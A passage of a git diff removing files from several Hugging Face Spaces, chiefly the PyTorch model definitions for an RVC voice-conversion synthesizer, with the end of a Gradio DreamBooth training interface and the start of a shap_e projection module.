The text-encoder is frozen after 10% of the steps for a style, 30% of the steps for an object and is fully trained for persons.") - steps = gr.Number(label="How many steps", value=800) - perc_txt_encoder = gr.Number(label="Percentage of the training steps the text-encoder should be trained as well", value=30) - - type_of_thing.change(fn=swap_text, inputs=[type_of_thing], outputs=[thing_description, thing_image_example, things_naming, perc_txt_encoder], queue=False) - training_summary = gr.Textbox("", visible=False, label="Training Summary") - steps.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - perc_txt_encoder.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - for file in file_collection: - file.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - train_btn = gr.Button("Start Training") - with gr.Box(visible=False) as try_your_model: - gr.Markdown("## Try your model") - with gr.Row(): - prompt = gr.Textbox(label="Type your prompt") - result_image = gr.Image() - generate_button = gr.Button("Generate Image") - with gr.Box(visible=False) as push_to_hub: - gr.Markdown("## Push to Hugging Face Hub") - model_name = gr.Textbox(label="Name of your model", placeholder="Tarsila do Amaral Style") - where_to_upload = gr.Dropdown(["My personal profile", "Public Library"], label="Upload to") - gr.Markdown("[A Hugging Face write access token](https://huggingface.co/settings/tokens), go to \"New token\" -> Role : Write. A regular read token won't work here.") - hf_token = gr.Textbox(label="Hugging Face Write Token") - push_button = gr.Button("Push to the Hub") - result = gr.File(label="Download the uploaded models in the diffusers format", visible=True) - success_message_upload = gr.Markdown(visible=False) - convert_button = gr.Button("Convert to CKPT", visible=False) - - train_btn.click(fn=train, inputs=is_visible+concept_collection+file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[result, try_your_model, push_to_hub, convert_button]) - generate_button.click(fn=generate, inputs=prompt, outputs=result_image) - push_button.click(fn=push, inputs=[model_name, where_to_upload, hf_token], outputs=[success_message_upload, result]) - convert_button.click(fn=convert_to_ckpt, inputs=[], outputs=result) -demo.launch() \ No newline at end of file diff --git a/spaces/videfikri/aicover/infer_pack/models.py b/spaces/videfikri/aicover/infer_pack/models.py deleted file mode 100644 index 96165f73644e6fb92d0ffedb4a3c9e1a457cb989..0000000000000000000000000000000000000000 --- a/spaces/videfikri/aicover/infer_pack/models.py +++ /dev/null @@ -1,982 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from infer_pack import modules -from infer_pack import attentions -from infer_pack import commons -from infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from infer_pack.commons import init_weights -import numpy as np -from infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - 
filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder256Sim(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - x = self.proj(x) * x_mask - return x, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class 
PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, 
the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, 
voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMs256NSFsid(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - **kwargs - ): - super().__init__() - if type(sr) == 
type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y, y_lengths, ds - ): # 这里ds是id,[bs,1] - # print(1,pitch.shape)#[bs,t] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - # print(-1,pitchf.shape,ids_slice,self.segment_size,self.hop_length,self.segment_size//self.hop_length) - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - # print(-2,pitchf.shape,z_slice.shape) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, pitch, nsff0, sid, max_len=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs256NSFsid_nono(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr=None, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - 
self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=False, - ) - self.dec = Generator( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward(self, phone, phone_lengths, y, y_lengths, ds): # 这里ds是id,[bs,1] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - o = self.dec(z_slice, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, sid, max_len=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs256NSFsid_sim(nn.Module): - """ - Synthesizer for Training - """ - - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - # hop_length, - gin_channels=0, - use_sdp=True, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256Sim( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - 
resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - is_half=kwargs["is_half"], - ) - - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y_lengths, ds - ): # y是spec不需要了现在 - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - x, x_mask = self.enc_p(phone, pitch, phone_lengths) - x = self.flow(x, x_mask, g=g, reverse=True) - z_slice, ids_slice = commons.rand_slice_segments( - x, y_lengths, self.segment_size - ) - - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice - - def infer( - self, phone, phone_lengths, pitch, pitchf, ds, max_len=None - ): # y是spec不需要了现在 - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - x, x_mask = self.enc_p(phone, pitch, phone_lengths) - x = self.flow(x, x_mask, g=g, reverse=True) - o = self.dec((x * x_mask)[:, :, :max_len], pitchf, g=g) - return o, o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - 
norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/vishnu0001/text2mesh/shap_e/models/transmitter/params_proj.py b/spaces/vishnu0001/text2mesh/shap_e/models/transmitter/params_proj.py deleted file mode 100644 index 11b3fd869ecf23cf66bc8edbedc98d8c22dfcfd9..0000000000000000000000000000000000000000 --- a/spaces/vishnu0001/text2mesh/shap_e/models/transmitter/params_proj.py +++ /dev/null @@ -1,197 +0,0 @@ -import math -from abc import ABC, abstractmethod -from collections import OrderedDict -from typing import Any, Dict, Optional, Tuple - -import numpy as np -import torch.nn as nn -from torch import torch - -from shap_e.util.collections import AttrDict - - -def flatten_param_shapes(param_shapes: Dict[str, Tuple[int]]): - flat_shapes = OrderedDict( - (name, (int(np.prod(shape)) // shape[-1], shape[-1])) - for name, shape in param_shapes.items() - ) - return flat_shapes - - -class ParamsProj(nn.Module, ABC): - def __init__(self, *, device: torch.device, param_shapes: Dict[str, Tuple[int]], d_latent: int): - super().__init__() - self.device = device - self.param_shapes = param_shapes - self.d_latent = d_latent - - @abstractmethod - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - pass - - -class LinearParamsProj(ParamsProj): - def __init__( - self, - *, - device: torch.device, - param_shapes: Dict[str, Tuple[int]], - d_latent: int, - init_scale: Optional[float] = None, - ): - super().__init__(device=device, param_shapes=param_shapes, d_latent=d_latent) - self.param_shapes = param_shapes - self.projections = 